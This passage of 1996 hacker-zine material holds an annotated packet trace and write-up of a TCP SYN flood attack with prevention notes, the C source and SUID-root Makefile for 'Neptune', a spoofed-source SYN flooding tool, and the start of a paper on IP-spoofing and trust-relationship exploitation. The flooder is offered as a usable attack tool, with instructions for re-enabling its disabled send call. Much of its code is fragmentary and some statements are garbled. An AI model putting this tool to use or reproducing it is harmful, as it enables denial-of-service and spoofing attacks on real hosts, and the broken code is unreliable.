
Network Monitor trace  Fri 07/12/96 10:23:34  Flood1.TXT

Frame   Time    Src MAC Addr   Dst MAC Addr   Protocol     Description                                                       Src Other Addr  Dst Other Addr  Type Other Addr

1       2.519   onyx           ash            TCP/23       ....S., len:    4, seq:3580643269, ack:1380647758, win:  512, src     IP
2       2.520   ash            onyx           TCP/1510     .A..S., len:    4, seq: 659642873, ack:3580643270, win:14335, src     IP
3       2.520   onyx           ash            TCP/23       .A...., len:    0, seq:3580643270, ack: 659642874, win:14260, src     IP

	A telnet client is started on Onyx, and we see the standard 3-way 
	handshake between the two hosts for the telnet session.

Lines 4-126 were interactive telnet traffic and added nothing to the 

127     12.804  ash            onyx           TCP/1510     .A...F, len:    0, seq: 659643408, ack:3580643401, win:14335, src     IP
128     12.804  onyx           ash            TCP/23       .A...., len:    0, seq:3580643401, ack: 659643409, win:14322, src     IP
129     12.805  onyx           ash            TCP/23       .A...F, len:    0, seq:3580643401, ack: 659643409, win:14335, src     IP
130     12.805  ash            onyx           TCP/1510     .A...., len:    0, seq: 659643409, ack:3580643402, win:14334, src     IP

	Here we see the 4-way connection termination procedure.

	At this point, the flood program is started on onyx, the information
	filled in, and the attack is launched. 
131     42.251  onyx           *BROADCAST     ARP_RARP  ARP: Request, Target IP:                                                               

	Onyx is attempting to get ash's ethernet address using ARP.  
132     42.251  ash            onyx           ARP_RARP  ARP: Reply, Target IP: Target Hdwr Addr: 0020AF2311D7                                  

	Ash responds with it's ethernet address.

133     42.252  onyx           ash            TCP/23       ....S., len:    0, seq:3364942082, ack:         0, win:  242, src     IP

	The flood begins.  Onyx sends the first of 10 TCP segments with the
	SYN bit on, and the IP address spoofed to the telnet daemon.

134     42.252  ash            *BROADCAST     ARP_RARP  ARP: Request, Target IP:                                                              

	Ash immediately attempts to resolve the ethernet address.  However,
	since there is no such host on the network (and no router to proxy
	the request with) the ARP request will not be answered.  The host,
	is in effect, unreachable.

135     42.271  onyx           ash            TCP/23       ....S., len:    0, seq:3381719298, ack:         0, win:  242, src     IP
136     42.291  onyx           ash            TCP/23       ....S., len:    0, seq:3398496514, ack:         0, win:  242, src     IP
137     42.311  onyx           ash            TCP/23       ....S., len:    0, seq:3415273730, ack:         0, win:  242, src     IP
138     42.331  onyx           ash            TCP/23       ....S., len:    0, seq:3432050946, ack:         0, win:  242, src     IP
139     42.351  onyx           ash            TCP/23       ....S., len:    0, seq:3448828162, ack:         0, win:  242, src     IP
140     42.371  onyx           ash            TCP/23       ....S., len:    0, seq:3465605378, ack:         0, win:  242, src     IP
141     42.391  onyx           ash            TCP/23       ....S., len:    0, seq:3482382594, ack:         0, win:  242, src     IP
142     42.411  onyx           ash            TCP/23       ....S., len:    0, seq:3499159810, ack:         0, win:  242, src     IP
143     42.431  onyx           ash            TCP/23       ....S., len:    0, seq:3515937026, ack:         0, win:  242, src     IP

	The next 9 of 10 SYNs.  The telnet daemon on ash is now flooded.
	At this point, another telnet client is started on Onyx.

144     47.227  onyx           *BROADCAST     ARP_RARP  ARP: Request, Target IP:                                                               

	Onyx is again attempting to get ash's ethernet address using ARP.
	Hmmm, this entry should be in the arp cache.  I should look into 

145     47.228  ash            onyx           ARP_RARP  ARP: Reply, Target IP: Target Hdwr Addr: 0020AF2311D7                                  

	Here is the ARP reply.

146     47.228  onyx           ash            TCP/23       ....S., len:    4, seq:3625358638, ack:         0, win:  512, src     IP
147     50.230  onyx           ash            TCP/23       ....S., len:    4, seq:3625358638, ack:         0, win:14335, src     IP
148     56.239  onyx           ash            TCP/23       ....S., len:    4, seq:3625358638, ack:         0, win:14335, src     IP

	Onyx is attempting to establish a connection with the telnet daemon
	on Ash, which is, as we saw, flooded.

149     67.251  ash            *BROADCAST     ARP_RARP  ARP: Request, Target IP:                                                              

	Ash is still trying to get the ethernet address of the spoofed host.
	In vain...

150     68.247  onyx           ash            TCP/23       ....S., len:    4, seq:3625358638, ack:         0, win:14335, src     IP
151     92.254  onyx           ash            TCP/23       ....S., len:    4, seq:3625358638, ack:         0, win:14335, src     IP

	Onyx is still transmitting it's connection-estabishment requests...
	Also in vain.

152     92.258  ash            *BROADCAST     ARP_RARP  ARP: Request, Target IP:                                                              

	Hello?  Are you out there?

		Section VI.	Neptune.c

	Neptune.c is the companion code.  It does everything we've talked 
about, and more.  Neptune.c is admittedly more complex than it needs to 
be.  I included several features that are not essential, but make the 
program more robust.  The program features: simple to use menuing system, an 
alternative command line interface for easy integration into scripts, 
ICMP_ECHO requesting to query if unreachable is in fact unreachable (AKA 
'ping'ing), infinity mode (read the code) and a daemon mode with (psuedo) 
random unreachable IP address choosing.

	The menu is really self explanatory...

1		Enter target host

Enter yur target.  If you are confused at this point, kill yurself.

2		Enter source (unreachable) host

Enter the puported sender.  It is integral that this host be routable but not
reachable.  Remember that the address must be a unicast address.  If it is a
broadcast or multicast address it will be dropped by the target TCP.

3		Send ICMP_ECHO(s) to unreachable

Make sure that yur puported sender is in fact unreachable.  This is not 100%
reliable as A) ICMP packets can be dropped by the unreliable network layer, 
B) the host may filter out ICMP_ECHO packets.

4		Enter port number to flood
The target port to flood.  There is an infinity switch.

5		Enter number of SYNs
The number of SYNs to send.  Remember, this attack is not bandwidth hungry, 
sending more packets than neccessary is totally useless.

6		Quit
Bye, bye.

7		Lanuch
Fire when ready.

8		Daemonize (may or may not be implemented in yur version)

Puts the program in dameon mode.  It forks to the background and does it's 
evilness there.  Needs two more options:  packet sending interval, and time 
for daemon to live.  Recommended packet sending interval is at least every
90 seconds, depending on the target TCP.  80 should work fine, as the 
connection establishment timer is 75 seconds.  Daemon lifetime is up to you.
Be kind.  
	Also the daemon portion includes routines to optionally make use
of a file of unreachable IP addresses and (pseudo) randomly choose from 
them.  The program reads the file and builds a dynamic array of these IP
addresses in network byte order and then uses rand (seeded from the time of
day in seconds --we don't need alot of entropy here, this isn't 
cryptography--) to generate a number and then it mods that number by the 
number of entries in the table to hash to a particular IP address. 

	Since the program opens raw sockets, it needs to run as root.  By
default, it is installed SUID root in /usr/local/bin/neptune with the access
list in /etc/sfaccess.conf.  The authentication mechanism works by checking 
the usernames (via UID) of the attempted flooders.  It is not a complex 
algorithm, and in fact the code is quite simple (asside:  If anyone can find 
any security problems with the program being SUID root, --above the fact 
that the program is admittedly evil-- I would love to hear about them).  Root 
is the only entry the access file starts off with.
	For the program to work, you need to remove the comment marks from 
line 318 (the actual sendto() call where the forged datagrams are sent).  I 
did that so the fools simply interested in causing trouble (and not interested
in learning) would find the program mostly useless.

		Section VII.	Discussion and Prevention

	As we have seen, the attack works because TCP is attempting to do it's
job of providing a reliable transport.  TCP must establish a connection first,
and this is where the weakness lies.  (T/TCP is immune to this attack via TAO.
See my future paper: `The Next Generation Internet` for information on T/TCP
and IPng.)  Under normal circumstances, assuming well-behaved networking 
software, the worst that can happen is a TCP-based server may be wrapped up in 
legimate connection-establishment processing and a few clients may have to 
retransmit thier SYNs.  But, a misbegotten client program can exploit this 
connection-establishment weakness and down a TCP-based server with only a few
doctored segments.  
	The fact that SYN flooding requires such a small amount of network 
traffic to be so effective is important to note.  Consider other network
DOS attacks such as ICMP_ECHO floods (ping floods), mail bombs, mass mailing 
list subscriptions, etc...  To be effective, all of these attacks require 
an attacker to transmit volumous amounts of network traffic.  Not only does
this make these attacks more noticable on both ends by decreasing the amount 
of available bandwidth (as such, often these attacks are waged from compromised 
machines) but it also adds to the general traffic problems of the Internet.
SYN flooding can be deadly effective with as little as 360 packets/hour.

		--[ Prevention ]--

	Ok, so how do we stop it?  Good question.  

		--[ TCPd ]--

	TCP wrappers are almost useless.  The magic they do is based on the 
validity of the source IP-address of incoming datagrams.  As we know, this can
be spoofed to whatever the attacker desires.  Unless the target has denied 
traffic from *everywhere* except known hosts, TCP wrappers will not save you.

		--[ Increase the Backlog ]--

	Increasing the default backlog is not much of a solution.  In 
comparision with the difficulty of an attacker simply sending more packets,
the memory requirements of the additional connection-establishment structures
is prohibitively expensive.  At best it is an obfuscative (word check...?)

		--[ Packet Filtering ]--

	A smart packet filter (or kernel modification) of some kind may be 
a viable solution.  Briefly:

- Host keeps a recent log of incoming packets with the `SYN` bit on in a 
linked list structure.
- The linked list cannot be permitted to grow without bound (another DOS
attack would present itself)
- When x amount of SYNs are received on a socket, certain characteristics
about the packets are compared, (Source port, source IP address, sequence
numbers, window size, etc) and if things seem fishy, the connection
requests and associated memory structures are immediately destroyed.

		Section VIII.	References

		Ppl:	A. Cox, R. Stevens
		Books:	TCP Illustrated vols II,III

This project made possible by a grant from the Guild Corporation.



# Neptune Makefile
# daemon9, 1996 Guild Productions

	@gcc -o neptune neptune.c
	@echo ""
	@echo "'make install' will install the program..."
	@echo ""
	@echo "Warning!  Neptune is installed SUID root by default!"
	@echo ""
	@echo " / Guild Corporation"
	strip ./neptune
	mv ./neptune /usr/local/bin/neptune
	chmod 4755 /usr/local/bin/neptune
	@echo "root" > /etc/sfaccess.conf
	@echo "Installation complete, access list is /etc/sfaccess.conf"
	@rm -f *.o neptune /etc/sfaccess.conf


			        v. 1.5


		      June 1996 Guild productions

	             comments to
	If you found this code alone, without the companion whitepaper
	please get the real-deal:
Brief synopsis:
	Floods the target host with TCP segments with the SYN bit on,
	puportedly from an unreachable host.  The return address in the 
	IP header is forged to be that of a known unreachable host.  The
	attacked TCP, if flooded sufficently, will be unable to respond
	to futher connects.  See the accompanying whitepaper for a full 
	treatment of the topic.  (Also see my paper on IP-spoofing for
	information on a related subject.)

	Figure it out, kid.  Menu is default action.  Command line usage is
	available for easy integration into shell scripts.  If you can't
	figure out an unreachable host, the program will not work.

	It would appear that flooding a host on every port (with the 
	infinity switch) has it's drawbacks.  So many packets are trying to 
	make their way to the target host, it seems as though many are 
	dropped, especially on ethernets.  Across the Internet, though, the 
	problem appears mostly mitigated.  The call to usleep appears to fix 
	this...  Coming up is a port scanning option that will find open 

Version History:
6/17/96 beta1:	SYN flooding, Cmd line and crude menu, ICMP stuff broken
6/20/96	beta2:	Better menu, improved SYN flooding, ICMP fixed... sorta
6/21/96	beta3:	Better menu still, fixed SYN flood clogging problem
		Fixed some name-lookup problems
6/22/96	beta4:	Some loop optimization, ICMP socket stuff changed, ICMP
		code fixed
6/23/96 1.0:	First real version...
6/25/96	1.1:	Cleaned up some stuff, added authentication hooks, fixed up
		input routine stuff
7/01/96	1.5:	Added daemonizing routine...

   This coding project made possible by a grant from the Guild corporation


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <syslog.h>
#include <pwd.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <fcntl.h>
#include <time.h>
#include <linux/signal.h>
#include <linux/ip.h>
#include <linux/tcp.h>
#include <linux/icmp.h>

#define BUFLEN 256
#define MENUBUF	64
#define MAXPORT 1024
#define	MAXPAK 4096		
#define	MENUSLEEP 700000 	
#define	FLOODSLEEP 100		/* Ethernet, or WAN? Yur mileage will vary.*/
#define	ICMPSLEEP 100		
#define ACCESSLIST "/etc/sfaccess.conf"

char werd[]={"\nThis code made possible by a grant from the Guild Corporation\n\0"};
void main(argc,argv)
int argc;
char *argv[];
	void usage(char *);
	void menu(int,char *);
	void flood(int,unsigned,unsigned,u_short,int);
	unsigned nameResolve(char *);
	int authenticate(int,char *);	
	unsigned unreachable,target;	
	int c,port,amount,sock1,fd;
	struct passwd *passEnt;
	char t[20],u[20];

		perror("Cannot open accesslist");
				/* Authenticate */
		fprintf(stderr,"Access Denied, kid\n");
				/* Open up a RAW socket */

   		perror("\nHmmm.... socket problems\n");
				/* Parse command-line arguments */
			case 's':	/* Source (spoofed) host */
			case 't':	/* Target host */
			case 'p':	/* Target port */
        		case '8':	/* infinity switch */
			case 'a':	/* Amount of SYNs to send */
        		default:	/* WTF? */

		printf("\n\nFlooding target: \t\t%u\nOn ports\t\t\t1-%d\nAmount: \t\t\t%u\nPuportedly from: \t\t%u \n",target,MAXPORT,amount,unreachable); 
		printf("\n\nFlooding target: \t\t%u\nOn port: \t\t\t%u\nAmount: \t\t\t%u\nPuportedly from: \t\t%u \n",target,port,amount,unreachable); 
	syslog(LOG_LOCAL6|LOG_INFO,"FLOOD: PID: %d, User:%s Target:%s Unreach:%s Port:%d Number:%d\n",getpid(),passEnt->pw_name,t,u,port,amount);  
}					/* End main */

 * 	Authenticate.  Makes sure user is authorized to run program.
int authenticate(fd,nameID)
int fd;
char *nameID;

	char buf[BUFLEN+1];
	char workBuffer[10];
	int i=0,j=0;	

			syslog(LOG_LOCAL6|LOG_INFO,"Failed authentication for %s\n",nameID);  
		else {
			syslog(LOG_LOCAL6|LOG_INFO,"Successful start by %s, PID: %d\n",nameID,getpid());  

 *	Flood.  This is main workhorse of the program.  IP and TCP header 
 *	construction occurs here, as does flooding.	
void flood(int sock,unsigned sadd,unsigned dadd,u_short dport,int amount){
	unsigned short in_cksum(unsigned short *,int);
   	struct packet{
      		struct iphdr ip;
      		struct tcphdr tcp;
	struct pseudo_header{		/* For TCP header checksum */
      		unsigned int source_address;
      		unsigned int dest_address;
      		unsigned char placeholder;
      		unsigned char protocol;
      		unsigned short tcp_length;
      		struct tcphdr tcp;
   	struct sockaddr_in sin;		/* IP address information */
   	register int i=0,j=0;		/* Counters */
	int tsunami=0;			/* flag */
	unsigned short sport=161+getpid();

		tsunami++;		/* GOD save them... */
		fprintf(stderr,"\nflooding port:");	

   			/* Setup the sin struct with addressing information */

   	sin.sin_family=AF_INET;		/* Internet address family */
   	sin.sin_port=sport;		/* Source port */
   	sin.sin_addr.s_addr=dadd;	/* Dest. address */
			/* Packet assembly begins here */

   				/* Fill in all the TCP header information */

   	packet.tcp.source=sport;	/* 16-bit Source port number */
   	packet.tcp.dest=htons(dport); 	/* 16-bit Destination port */
   	packet.tcp.seq=49358353+getpid();	/* 32-bit Sequence Number */
   	packet.tcp.ack_seq=0;		/* 32-bit Acknowledgement Number */
   	packet.tcp.doff=5;		/* Data offset */
	packet.tcp.res1=0;		/* reserved */
	packet.tcp.res2=0;		/* reserved */	
   	packet.tcp.urg=0;		/* Urgent offset valid flag */		
   	packet.tcp.ack=0;		/* Acknowledgement field valid flag */
   	packet.tcp.psh=0;		/* Push flag */
   	packet.tcp.rst=0;		/* Reset flag */
   	packet.tcp.syn=1;		/* Synchronize sequence numbers flag */
   	packet.tcp.fin=0;		/* Finish sending flag */
   	packet.tcp.window=htons(242); /* 16-bit Window size */
   	packet.tcp.check=0;		/* 16-bit checksum (to be filled in below) */
   	packet.tcp.urg_ptr=0;		/* 16-bit urgent offset */
   				/* Fill in all the IP header information */
   	packet.ip.version=4;		/* 4-bit Version */
	packet.ip.ihl=5;		/* 4-bit Header Length */
   	packet.ip.tos=0;		/* 8-bit Type of service */
   	packet.ip.tot_len=htons(40);	/* 16-bit Total length */;		/* 16-bit ID field */
   	packet.ip.frag_off=0;		/* 13-bit Fragment offset */
   	packet.ip.ttl=255;		/* 8-bit Time To Live */
   	packet.ip.protocol=IPPROTO_TCP; /* 8-bit Protocol */
   	packet.ip.check=0;		/* 16-bit Header checksum (filled in below) */
   	packet.ip.saddr=sadd;		/* 32-bit Source Address */
   	packet.ip.daddr=dadd;		/* 32-bit Destination Address */
			/* Psuedo-headers needed for TCP hdr checksum (they
			do not change and do not need to be in the loop) */
	while(1){			/* Main loop */

   		for(i=0;i<amount;i++){	/* Flood loop */

				/* Certian header fields should change */	

      			packet.tcp.source++;	/* Source port inc */
      			packet.tcp.seq++;	/* Sequence Number inc */
      			packet.tcp.check=0;	/* Checksum will need to change */;		/* ID number */
      			packet.ip.check=0;	/* Checksum will need to change */
      			/* IP header checksum */
			packet.ip.check=in_cksum((unsigned short *)&packet.ip,20);
			/* Setup TCP headers for checksum */

      			bcopy((char *)&packet.tcp,(char *)&pseudo_header.tcp,20);

			/* TCP header checksum */

      			packet.tcp.check=in_cksum((unsigned short *)&pseudo_header,32);

			/* As it turns out, if we blast packets too fast, many
		 	get dropped, as the receiving kernel can't cope (at 
			least on an ethernet).  This value could be tweaked
			prolly, but that's up to you for now... */
		/* This is where we sit back and watch it all come together */
			/*sendto(sock,&packet,40,0,(struct sockaddr *)&sin,sizeof(sin));*/

 *	IP Family checksum routine (from UNP)
unsigned short in_cksum(unsigned short *ptr,int nbytes){

	register long           sum;            /* assumes long == 32 bits */
        u_short                 oddbyte;
        register u_short        answer;         /* assumes u_short == 16 bits */
         * Our algorithm is simple, using a 32-bit accumulator (sum),
         * we add sequential 16-bit words to it, and at the end, fold back
         * all the carry bits from the top 16 bits into the lower 16 bits.
        sum = 0;
        while (nbytes > 1)  {
                sum += *ptr++;
                nbytes -= 2;
                                /* mop up an odd byte, if necessary */
        if (nbytes == 1) {
                oddbyte = 0;            /* make sure top half is zero */
                *((u_char *) &oddbyte) = *(u_char *)ptr;   /* one byte only */
                sum += oddbyte;
         * Add back carry outs from top 16 bits to low 16 bits.
        sum  = (sum >> 16) + (sum & 0xffff);    /* add high-16 to low-16 */
        sum += (sum >> 16);                     /* add carry */
        answer = ~sum;          /* ones-complement, then truncate to 16 bits */

 *	Converts IP addresses
unsigned nameResolve(char *hostname){

	struct in_addr addr;
   	struct hostent *hostEnt;

         		fprintf(stderr,"Name lookup failure: `%s`\n",hostname);
      		bcopy(hostEnt->h_addr,(char *)&addr.s_addr,hostEnt->h_length);
   	return addr.s_addr;

 *	Menu function.  Nothing suprising here.  Except that one thing.
void menu(sock1,nameID)
int sock1;
char *nameID;
	int slickPing(int,int,char *);
	void flood(int,unsigned,unsigned,u_short,int);
	unsigned nameResolve(char *);
	void demon(int,char *,char *,int,int,int,int);

	int i,sock2,menuLoop=1,icmpAmt,port,amount,interval,ttl;
	char optflags[7]={0};		/* So we can keep track of the options */
	static char tmp[MENUBUF+1]={0},target[MENUBUF+1]={0},unreach[MENUBUF+1]={0};	

		printf("\n\n\t\t\t[   SYNflood Menu   ]\n\t\t\t    [  daemon9  ]\n\n");
		if(!optflags[0])printf("1\t\tEnter target host\n");
		else printf("[1]\t\tTarget:\t\t\t%s\n",target);
		if(!optflags[1])printf("2\t\tEnter source (unreachable) host\n");
		else printf("[2]\t\tUnreachable:\t\t%s\n",unreach);
		if(!optflags[2])printf("3\t\tSend ICMP_ECHO(s) to unreachable\n");
		else printf("[3]\t\tUnreachable host:\tverified unreachable\n");
		if(!optflags[3])printf("4\t\tEnter port number to flood\n");
		else if(port)printf("[4]\t\tFlooding:\t\t%d\n",port);
		else printf("[4]\t\tFlooding:\t\t1-1024\n");
		if(!optflags[4])printf("5\t\tEnter number of SYNs\n");
		else printf("[5]\t\tNumber SYNs:\t\t%d\n",amount);
		if(optflags[0]&&optflags[1]&&optflags[3]&&optflags[4])printf("7\t\tLaunch Attack\n");
		fgets(tmp,BUFLEN/2,stdin);	/* tempered input */
			case 1:	
				printf("[hostname]-> ");
			case 2:
				printf("[hostname]-> ");
			case 3:
					fprintf(stderr,"Um, enter a host first\n");
						/* Raw ICMP socket */
   					perror("\nHmmm.... socket problems\n");
				printf("[number of ICMP_ECHO's]-> ");
					fprintf(stderr,"Host is reachable... Pick a new one\n");
			case 4: 
				printf("[port number]-> ");
			case 5:
				printf("[number of SYNs]-> ");
			case 6:
			case 7:
					syslog(LOG_LOCAL6|LOG_INFO,"FLOOD: PID: %d, User:%s Target:%s Unreach:%s Port:%d Number:%d\n",getpid(),nameID,target,unreach,port,amount);  
					fprintf(stderr,"Illegal option --try again\n");
			case 8:
						fprintf(stderr,"Cannot set infinity flag in daemon mode.  Sorry.\n");
					printf("[packet sending interval in seconds {80}]-> ");
					printf("[time for daemon to live in whole hours(0=forever)]-> ");
					syslog(LOG_LOCAL6|LOG_INFO,"DFLOOD: PID: %d, User:%s Target:%s Unreach:%s Port:%d Number:%d Interval: %d TTL: %d\n",getpid(),nameID,target,unreach,port,amount,interval,ttl);  
					fprintf(stderr,"Illegal option --try again\n");
				fprintf(stderr,"Illegal option --try again\n");


 *	SlickPing.  A quick and dirty ping hack.  Sends <amount> ICMP_ECHO 
 *	packets and waits for a reply on any one of them...  It has to check 
 *	to make sure the ICMP_ECHOREPLY is actually meant for us, as raw ICMP 
 *	sockets get ALL the ICMP traffic on a host, and someone could be 
 *	pinging some other host and we could get that ECHOREPLY and foul 
 *	things up for us.
int slickPing(amount,sock,dest)
int amount,sock;
char *dest;

	int alarmHandler();
	unsigned nameResolve(char *);
	register int retcode,j=0;
	struct icmphdr *icmp;
	struct sockaddr_in sin;
	unsigned char sendICMPpak[MAXPAK]={0};
	unsigned short pakID=getpid()&0xffff;

	struct ippkt{
   		struct iphdr ip;
   		struct icmphdr icmp;
   		char buffer[MAXPAK];

	bzero((char *)&sin,sizeof(sin));

		/* ICMP Packet assembly  */
	/* We let the kernel create our IP header as it is legit */

	icmp=(struct icmphdr *)sendICMPpak;
	icmp->type=ICMP_ECHO;			/* Requesting an Echo */
	icmp->code=0;				/* 0 for ICMP ECHO/ECHO_REPLY */
	icmp->;			/* To identify upon return */	
	icmp->un.echo.sequence=0;		/* Not used for us */
	icmp->checksum=in_cksum((unsigned short *)icmp,64);

	fprintf(stderr,"sending ICMP_ECHO packets: ");
		usleep(ICMPSLEEP);		/* For good measure */
		retcode=sendto(sock,sendICMPpak,64,0,(struct sockaddr *)&sin,sizeof(sin));
				perror("ICMP sendto err");
			else fprintf(stderr,"Only wrote %d bytes",retcode);
		else fprintf(stderr,".");
	signal(SIGALRM,alarmHandler);	/* catch the ALARM and handle it */
	fprintf(stderr,"\nSetting alarm timeout for 10 seconds...\n");
	alarm(10);	/* ALARM is set b/c read() will block forever if no */
	while(1){	/* packets arrive...   (which is what we want....)  */
		read(sock,(struct ippkt *)&pkt,MAXPAK-1);

 *	SIGALRM signal handler.  Souper simple.
int alarmHandler(){

	HANDLERCODE=0;		/* shame on me for using global vars */

 *	Usage function...  
void usage(nomenclature)
char *nomenclature;
	fprintf(stderr,"\n\nUSAGE: %s \n\t-s unreachable_host \n\t-t target_host \n\t-p port [-8 (infinity switch)] \n\t-a amount_of_SYNs\n",nomenclature);

 *	Demon.  Backgrounding procedure and looping stuff.  

void demon(sock,unreachable,target,port,amount,interval,ttl)
int sock;
char *unreachable;
char *target;
int port;
int amount;
int interval;
int ttl;
	fprintf(stderr,"\nSorry Daemon mode not available in this version\n");



                             ==Phrack Magazine==

             Volume Seven, Issue Forty-Eight, File 14 of 18

			 [ IP-spoofing Demystified ]
		      (Trust-Relationship Exploitation)

			by daemon9 / route / infinity
			     for Phrack Magazine
		      June 1996 Guild Productions, kid

		       comments to

        The purpose of this paper is to explain IP-spoofing to the
masses.  It assumes little more than a working knowledge of Unix and
TCP/IP.  Oh, and that yur not a moron...
        IP-spoofing is complex technical attack that is made up of
several components.  (In actuality, IP-spoofing is not the attack, but
a step in the attack.  The attack is actually trust-relationship
exploitation.  However, in this paper,  IP-spoofing will refer to the
whole attack.)  In this paper, I will explain the attack in detail,
including the relevant operating system and networking information.


        --[ The Players ]--

        A:      Target host
        B:      Trusted host
        X:      Unreachable host
        Z:      Attacking host
        (1)2:   Host 1 masquerading as host 2

        --[ The Figures ]--

        There are several figures in the paper and they are to be
interpreted as per the following example:

ick   host a      control     host b
1       A       ---SYN--->      B

tick:   A tick of time.  There is no distinction made as to *how*
much time passes between ticks, just that time passes.  It's generally
not a great deal.
host a: A machine particpating in a TCP-based conversation.
control: This field shows any relevant control bits set in the TCP
header and the direction the data is flowing
host b: A machine particpating in a TCP-based conversation.

In this case, at the first refrenced point in time host a is sending
a TCP segment to host b with the SYN bit on.  Unless stated, we are
generally not concerned with the data portion of the TCP segment.

        --[ Trust Relationships ]--

        In the Unix world, trust can be given all too easily.  Say you
have an account on machine A, and on machine B.  To facilitate going
betwixt the two with a minimum amount of hassle, you want to setup a
full-duplex trust relationship between them.  In your home directory
at A you create a .rhosts file: `echo "B username" > ~/.rhosts` In
your home directory at B you create a .rhosts file: `echo "A username"
> ~/.rhosts` (Alternately, root can setup similar rules in
/etc/hosts.equiv, the difference being that the rules are hostwide,
rather than just on an individual basis.)  Now, you can use any of the
r* commands without that annoying hassle of password authentication.
These commands will allow address-based authentication, which will
grant or deny access based off of the IP address of the service

        --[ Rlogin ]--

        Rlogin is a simple client-server based protocol that uses TCP
as it's transport.  Rlogin allows a user to login remotely from one
host to another, and, if the target machine trusts the other, rlogin
will allow the convienience of not prompting for a password.  It will
instead have authenticated the client via the source IP address.  So,
from our example above, we can use rlogin to remotely login to A from
B (or vice-versa) and not be prompted for a password.

        --[ Internet Protocol ]--

        IP is the connectionless, unreliable network protocol in the
TCP/IP suite.  It has two 32-bit header fields to hold address
information.  IP is also the busiest of all the TCP/IP protocols as
almost all TCP/IP traffic is encapsulated in IP datagrams.  IP's job
is to route packets around the network.  It provides no mechanism for
reliability or accountability, for that, it relies on the upper
layers.  IP simply sends out datagrams and hopes they make it intact.
If they don't, IP can try to send an ICMP error message back to the
source, however this packet can get lost as well.  (ICMP is Internet
Control Message Protocol and it is used to relay network conditions
and different errors to IP and the other layers.)  IP has no means to
guarantee delivery.  Since IP is connectionless, it does not maintain
any connection state information.  Each IP datagram is sent out without
regard to the last one or the next one.  This, along with the fact that
it is trivial to modify the IP stack to allow an arbitrarily choosen IP
address in the source (and destination) fields make IP easily subvertable.

        --[ Transmission Control Protocol ]--

        TCP is the connection-oriented, reliable transport protocol
in the TCP/IP suite.  Connection-oriented simply means that the two
hosts participating in a discussion must first establish a connection
before data may change hands.  Reliability is provided in a number of
ways but the only two we are concerned with are data sequencing and
acknowledgement.  TCP assigns sequence numbers to every segment and
acknowledges any and all data segments recieved from the other end.
(ACK's consume a sequence number, but are not themselves ACK'd.)
This reliability makes TCP harder to fool than IP.

        --[ Sequence Numbers, Acknowledgements and other flags ]--

        Since TCP is reliable, it must be able to recover from
lost, duplicated, or out-of-order data.  By assigning a sequence
number to every byte transfered, and requiring an acknowledgement from
the other end upon receipt, TCP can guarantee reliable delivery.  The
receiving end uses the sequence numbers to ensure proper ordering of
the data and to eliminate duplicate data bytes.
        TCP sequence numbers can simply be thought of as 32-bit
counters.  They range from 0 to 4,294,967,295.  Every byte of
data exchanged across a TCP connection (along with certain flags)
is sequenced.  The sequence number field in the TCP header will
contain the sequence number of the *first* byte of data in the
TCP segment.  The acknowledgement number field in the TCP header
holds the value of next *expected* sequence number, and also
acknowledges *all* data up through this ACK number minus one.
        TCP uses the concept of window advertisement for flow
control.  It uses a sliding window to tell the other end how much
data it can buffer.  Since the window size is 16-bits a receiving TCP
can advertise up to a maximum of 65535 bytes.  Window advertisement
can be thought of an advertisment from one TCP to the other of how
high acceptable sequence numbers can be.
        Other TCP header flags of note are RST (reset), PSH (push)
and FIN (finish).  If a RST is received, the connection is
immediately torn down.  RSTs are normally sent when one end
receives a segment that just doesn't jive with current connection
(we will encounter an example below).  The PSH flag tells the
reciever to pass all the data is has queued to the aplication, as
soon as possible.  The FIN flag is the way an application begins a
graceful close of a connection (connection termination is a 4-way
process). When one end recieves a FIN, it ACKs it, and does not
expect to receive any more data (sending is still possible, however).

        --[ TCP Connection Establishment ]--

        In order to exchange data using TCP, hosts must establish a
a connection.  TCP establishes a connection in a 3 step process called
the 3-way handshake.  If machine A is running an rlogin client and
wishes to conect to an rlogin daemon on machine B, the process is as


1       A       ---SYN--->      B

2       A    <---SYN/ACK---     B

3       A       ---ACK--->      B

At (1) the client is telling the server that it wants a connection.
This is the SYN flag's only purpose.  The client is telling the
server that the sequence number field is valid, and should be checked.
The client will set the sequence number field in the TCP header to
it's ISN (initial sequence number).  The server, upon receiving this
segment (2) will respond with it's own ISN (therefore the SYN flag is
on) and an ACKnowledgement of the clients first segment (which is the
client's ISN+1).  The client then ACK's the server's ISN (3).  Now,
data transfer may take place.

        --[ The ISN and Sequence Number Incrementation ]--

        It is important to understand how sequence numbers are
initially choosen, and how they change with respect to time.  The
initial sequence number when a host is bootstraped is initialized
to 1. (TCP actually calls this variable 'tcp_iss' as it is the initial
*send* sequence number.  The other sequence number variable,
'tcp_irs' is the initial *receive* sequence number and is learned
during the 3-way connection establishment.  We are not going to worry
about the distinction.)  This practice is wrong, and is acknowledged
as so in a comment the tcp_init() function where it appears.  The ISN
is incremented by 128,000 every second, which causes the 32-bit ISN
counter to wrap every 9.32 hours if no connections occur.  However,
each time a connect() is issued, the counter is incremented by
        One important reason behind this predictibility is to
minimize the chance that data from an older stale incarnation
(that is, from the same 4-tuple of the local and remote
IP-addresses TCP ports) of the current connection could arrive
and foul things up.  The concept of the 2MSL wait time applies
here, but is beyond the scope of this paper.  If sequence
numbers were choosen at random when a connection arrived, no
guarantees could be made that the sequence numbers would be different
from a previous incarnation.  If some data that was stuck in a
routing loop somewhere finally freed itself and wandered into the new
incarnation of it's old connection, it could really foul things up.

        --[ Ports ]--

        To grant simultaneous access to the TCP module, TCP provides
a user interface called a port.  Ports are used by the kernel to
identify network processes.  These are strictly transport layer
entities (that is to say that IP could care less about them).
Together with an IP address, a TCP port provides provides an endpoint
for network communications.  In fact, at any given moment *all*
Internet connections can be described by 4 numbers: the source IP
address and source port and the destination IP address and destination
port.  Servers are bound to 'well-known' ports so that they may be
located on a standard port on different systems.  For example, the
rlogin daemon sits on TCP port 513.

                [SECTION II.  THE ATTACK]

        ...The devil finds work for idle hands....

        --[ Briefly... ]--

        IP-spoofing consists of several steps, which I will
briefly outline here, then explain in detail.  First, the target host
is choosen.  Next, a pattern of trust is discovered, along with a
trusted host.  The trusted host is then disabled, and the target's TCP
sequence numbers are sampled.  The trusted host is impersonated, the
sequence numbers guessed, and a connection attempt is made to a
service that only requires address-based authentication.  If
successful, the attacker executes a simple command to leave a

        --[ Needful Things ]--

        There are a couple of things one needs to wage this attack:

                (1) brain, mind, or other thinking device
                (1) target host
